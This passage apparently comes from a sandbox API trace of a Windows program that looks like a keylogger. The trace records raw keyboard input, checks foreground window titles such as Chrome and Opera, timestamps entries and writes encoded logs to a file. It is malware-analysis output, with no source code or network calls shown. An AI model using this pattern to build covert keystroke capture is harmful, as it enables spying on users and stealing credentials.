lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="OperaWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="Chrome_WidgetWin_1", lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] VarBstrCmp (bstrLeft="#32770", bstrRight="CabinetWClass", lcid=0x0, dwFlags=0x30001) returned 0x0 [0220.994] SendMessageA (hWnd=0x20206, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x11 [0221.039] GetLastError () returned 0x0 [0221.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f834, cbMultiByte=1, lpWideCharStr=0x6d25ec, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0221.039] SysStringLen (param_1="") returned 0x11 [0221.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0221.040] SendMessageA (hWnd=0x20206, Msg=0xd, wParam=0x12, lParam=0x6d25ec) returned 0x11 [0221.098] GetLastError () returned 0x0 [0221.098] SysStringByteLen (bstr="桓瑵䐠睯楗摮睯s") returned 0x11 [0221.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d25ec, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0221.099] SendMessageA (hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0221.099] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0221.099] GetLastError () returned 0x578 [0221.099] GetLastError () returned 0x578 [0221.099] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x1e, wMilliseconds=0x1d3)) [0221.099] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0221.099] VarFormat (in: pvarIn=0x30f780, pstrFormat="mm/dd/yy", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f744 | out: pbstrOut=0x30f744*="11/05/18") returned 0x0 [0221.099] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x1e, wMilliseconds=0x1e2)) [0221.099] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0221.100] VarFormat (in: pvarIn=0x30f780, pstrFormat="hh:mm:ss", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f740 | out: pbstrOut=0x30f740*="09:30:30") returned 0x0 [0221.100] VarBstrCmp (bstrLeft="11/05/18", bstrRight="11/05/18", lcid=0x0, dwFlags=0x30001) returned 0x1 [0221.100] GetUserDefaultLCID () returned 0x409 [0221.100] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.100] SysStringLen (param_1="GetForegroundWindow") returned 0x13 [0221.100] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetForegroundWindow", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0221.100] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0221.100] GetUserDefaultLCID () returned 0x409 [0221.100] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.101] SysStringLen (param_1="\r\n[Shut Down Windows]\r\n") returned 0x17 [0221.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\r\n[Shut Down Windows]\r\n", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0221.101] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0221.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0221.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x6e0ef4, cchWideChar=7 | out: lpWideCharStr="Source") returned 7 [0221.101] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x30f6c8) [0221.101] RtlUnwind (TargetFrame=0x30f7ec, TargetIp=0x72a43bb5, ExceptionRecord=0x0, ReturnValue=0x0) [0221.101] GetUserDefaultLCID () returned 0x409 [0221.101] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.101] SysStringByteLen (bstr="\xb2ef\x16ef\xe6be\xe7ff\x7c68\x66c5\x25b6\x2e8c\xe597\x730\xec95\x08") returned 0x17 [0221.101] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6d259c, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0221.101] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.101] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.101] ITextStream:Write (This=0x3d458, Text="\xef\xb2\xef\x16\xbe\xe6\xff\xe7\x68\x7c\xc5\x66\xb6\x25\x152\x2e\x2014\xe5\x30\x07\x2022\xec\x08\x0d\x0a") returned 0x0 [0221.102] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f9b8 | out: ppsaOut=0x30f9b8) returned 0x0 [0221.102] GetUserDefaultLCID () returned 0x409 [0221.102] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0221.102] SysStringLen (param_1="user32.dll") returned 0xb [0221.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0221.102] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0221.103] GetUserDefaultLCID () returned 0x409 [0221.103] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0221.103] SysStringLen (param_1="SetTimer") returned 0x9 [0221.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTimer", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0221.103] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0221.103] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.103] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0221.103] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.103] GetProcAddress (hModule=0x77820000, lpProcName="SetTimer") returned 0x778379fb [0221.103] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0221.103] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.103] SetTimer (hWnd=0x50276, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x404434) returned 0x1 [0221.103] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.103] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x4, lParam=0x20206) returned 0x0 [0221.104] GetLastError () returned 0x0 [0221.104] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.104] IsWindow (hWnd=0x50276) returned 1 [0221.104] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.104] GetParent (hWnd=0x50276) returned 0x0 [0221.104] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.104] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.104] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x20206) returned 0x0 [0221.104] GetLastError () returned 0x0 [0221.104] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.104] IsWindow (hWnd=0x50276) returned 1 [0221.104] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.104] GetParent (hWnd=0x50276) returned 0x0 [0221.104] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.104] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.104] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x20206) returned 0x0 [0221.104] GetLastError () returned 0x0 [0221.104] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.104] IsWindow (hWnd=0x50276) returned 1 [0221.104] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.104] GetParent (hWnd=0x50276) returned 0x0 [0221.105] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.105] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.105] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x2, lParam=0x20206) returned 0x0 [0221.105] GetLastError () returned 0x0 [0221.105] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.105] IsWindow (hWnd=0x50276) returned 1 [0221.105] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.105] GetParent (hWnd=0x50276) returned 0x0 [0221.105] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.105] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.105] GetRawInputData (in: hRawInput=0x110237, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0221.105] GetLastError () returned 0x0 [0221.105] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x110237) returned 0x0 [0221.105] GetLastError () returned 0x0 [0221.105] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.105] IsWindow (hWnd=0x50276) returned 1 [0221.105] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.105] GetParent (hWnd=0x50276) returned 0x0 [0221.105] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.105] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.105] GetRawInputData (in: hRawInput=0xa0231, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0221.105] GetLastError () returned 0x0 [0221.105] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0xa0231) returned 0x0 [0221.105] GetLastError () returned 0x0 [0221.106] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.106] IsWindow (hWnd=0x50276) returned 1 [0221.106] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.106] GetParent (hWnd=0x50276) returned 0x0 [0221.106] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.106] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.106] GetRawInputData (in: hRawInput=0x8026d, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0221.106] GetLastError () returned 0x0 [0221.106] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x8026d) returned 0x0 [0221.106] GetLastError () returned 0x0 [0221.106] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.106] IsWindow (hWnd=0x50276) returned 1 [0221.106] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.106] GetParent (hWnd=0x50276) returned 0x0 [0221.106] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.106] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.106] GetRawInputData (in: hRawInput=0xf02b9, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0221.106] GetLastError () returned 0x0 [0221.106] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0xf02b9) returned 0x0 [0221.106] GetLastError () returned 0x0 [0221.106] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.106] IsWindow (hWnd=0x50276) returned 1 [0221.106] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.107] GetParent (hWnd=0x50276) returned 0x0 [0221.107] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.107] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.107] GetRawInputData (in: hRawInput=0x100113, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0221.107] GetLastError () returned 0x0 [0221.107] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0xd, lParam=0x0) returned 1 [0221.107] GetLastError () returned 0x0 [0221.107] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x100113) returned 0x0 [0221.107] GetLastError () returned 0x0 [0221.107] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.107] IsWindow (hWnd=0x50276) returned 1 [0221.107] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.107] GetParent (hWnd=0x50276) returned 0x0 [0221.107] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.107] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.107] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0xd, lParam=0x0) returned 0x0 [0221.107] GetLastError () returned 0x0 [0221.107] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.107] IsWindow (hWnd=0x50276) returned 1 [0221.107] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.107] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.107] GetParent (hWnd=0x50276) returned 0x0 [0221.107] TranslateMessage (lpMsg=0x30fb80) returned 1 [0221.107] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0221.107] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0xd, lParam=0x0) returned 0x1 [0221.107] GetLastError () returned 0x0 [0221.108] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.108] IsWindow (hWnd=0x50276) returned 1 [0221.108] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.108] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.108] GetParent (hWnd=0x50276) returned 0x0 [0221.108] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.108] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0221.108] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x102, wParam=0xd, lParam=0x0) returned 0x1 [0221.108] GetLastError () returned 0x578 [0221.108] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.108] IsWindow (hWnd=0x50276) returned 1 [0221.108] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.108] GetParent (hWnd=0x50276) returned 0x0 [0221.108] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.108] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.108] GetRawInputData (in: hRawInput=0xa0291, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0221.109] GetLastError () returned 0x0 [0221.109] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0xa0291) returned 0x0 [0221.109] GetLastError () returned 0x0 [0221.109] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0221.109] GetTickCount () returned 0x3c63b [0221.109] GetTickCount () returned 0x3c63b [0221.109] GetTickCount () returned 0x3c63b [0221.109] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0221.109] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0221.109] WaitMessage () returned 1 [0221.110] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0221.110] IsWindow (hWnd=0x50276) returned 1 [0221.110] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0221.110] GetParent (hWnd=0x50276) returned 0x0 [0221.110] TranslateMessage (lpMsg=0x30fb80) returned 0 [0221.110] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0221.110] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f9b8 | out: ppsaOut=0x30f9b8) returned 0x0 [0221.111] GetUserDefaultLCID () returned 0x409 [0221.111] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0221.111] SysStringLen (param_1="user32.dll") returned 0xb [0221.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0221.111] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0221.112] GetUserDefaultLCID () returned 0x409 [0221.112] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0221.112] SysStringLen (param_1="KillTimer") returned 0xa [0221.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="KillTimer", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0221.112] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0221.112] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.112] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0221.112] SetErrorMode (uMode=0x8001) returned 0x8001 [0221.112] GetProcAddress (hModule=0x77820000, lpProcName="KillTimer") returned 0x778379db [0221.112] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0221.112] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.112] KillTimer (hWnd=0x50276, uIDEvent=0x0) returned 1 [0221.113] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.113] SendMessageA (hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0221.113] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0221.113] GetLastError () returned 0x0 [0221.113] GetLastError () returned 0x0 [0221.113] SendMessageA (hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0221.113] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0221.113] GetLastError () returned 0x0 [0221.113] GetLastError () returned 0x0 [0221.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f830, cbMultiByte=1, lpWideCharStr=0x6d20c4, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0221.113] SysStringLen (param_1="") returned 0x2 [0221.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0221.113] SendMessageA (hWnd=0x50276, Msg=0xd, wParam=0x3, lParam=0x6d20c4) returned 0x2 [0221.113] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xd, wParam=0x3, lParam=0x6d20c4) returned 0x2 [0221.113] GetLastError () returned 0x0 [0221.114] GetLastError () returned 0x0 [0221.114] SysStringByteLen (bstr="਍") returned 0x2 [0221.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20c4, cbMultiByte=2, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0221.114] SendMessageA (hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0221.114] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0221.114] GetLastError () returned 0x578 [0221.114] GetLastError () returned 0x578 [0221.114] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x1e, wMilliseconds=0x1e2)) [0221.114] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0221.114] VarFormat (in: pvarIn=0x30f780, pstrFormat="mm/dd/yy", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f744 | out: pbstrOut=0x30f744*="11/05/18") returned 0x0 [0221.115] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x1e, wMilliseconds=0x1e2)) [0221.115] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0221.115] VarFormat (in: pvarIn=0x30f780, pstrFormat="hh:mm:ss", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f740 | out: pbstrOut=0x30f740*="09:30:30") returned 0x0 [0221.115] VarBstrCmp (bstrLeft="11/05/18", bstrRight="11/05/18", lcid=0x0, dwFlags=0x30001) returned 0x1 [0221.116] GetUserDefaultLCID () returned 0x409 [0221.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.116] SysStringLen (param_1="GetForegroundWindow") returned 0x13 [0221.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetForegroundWindow", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0221.116] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0221.116] GetUserDefaultLCID () returned 0x409 [0221.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.116] SysStringLen (param_1="\r\n") returned 0x2 [0221.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0221.116] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0221.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0221.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x6e0f1c, cchWideChar=7 | out: lpWideCharStr="Source") returned 7 [0221.116] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x30f6c8) [0221.117] RtlUnwind (TargetFrame=0x30f7ec, TargetIp=0x72a43bb5, ExceptionRecord=0x0, ReturnValue=0x0) [0221.117] GetUserDefaultLCID () returned 0x409 [0221.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0221.117] SysStringByteLen (bstr="\xb2ef") returned 0x2 [0221.117] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6e0f6c, cbMultiByte=2, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0221.117] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0221.117] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0221.117] ITextStream:Write (This=0x3d458, Text="\xef\xb2\x0d\x0a") returned 0x0 [0221.117] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f848 | out: ppsaOut=0x30f848) returned 0x0 [0221.118] GetUserDefaultLCID () returned 0x409 [0221.118] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f604, cchData=6 | out: lpLCData="1252") returned 5 [0221.118] SysStringLen (param_1="user32.dll") returned 0xb [0221.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 